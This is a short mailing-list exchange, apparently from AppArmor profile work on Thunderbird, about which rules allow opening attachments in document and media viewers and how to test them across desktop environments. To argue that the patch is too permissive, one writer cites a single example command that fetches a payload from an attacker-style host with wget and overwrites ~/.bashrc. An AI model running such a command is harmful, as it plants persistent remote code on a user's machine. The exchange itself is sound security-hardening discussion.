On 2017.10.25 10:26, intrigeri wrote:
Indeed, it might be that the specific rules about evince & totem
you're quoting from my patch above are not needed. It would be nice if
we could drop them (and the maintenance cost of hard-coding a list of
exceptions) so I'm hoping your testing confirms your hypothesis :)
Yes I am going to test multiple format attachements just now.
If there's extra rules for XFCE, maybe I should try Thunderbird on several DE.
This would be sweet but right now the thing is totally broken, so
fixing them on the default DE (GNOME) only would be a huge improvement
already. I suggest you focus on getting this done first, and later we
can test (or call for testing!) on other DEs. There's no way we can
test all relevant configurations, so we'll need to rely on user
testing to some degree anyway.
OK if we call this urgent, we do as such. Personally, I would like to have bunch of abstractions to contain all image,
document viewers, editors and what not, so that browsers, email clients and IM's could include them (or one big
proxy-policy file that includes all these grouped -browsers -editors -viewers) and so have more restrictive policy. With
pending patch, some Thunderbird exploit needs just execute `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end
game. But let's fix this critical broken stuff and do the right way later.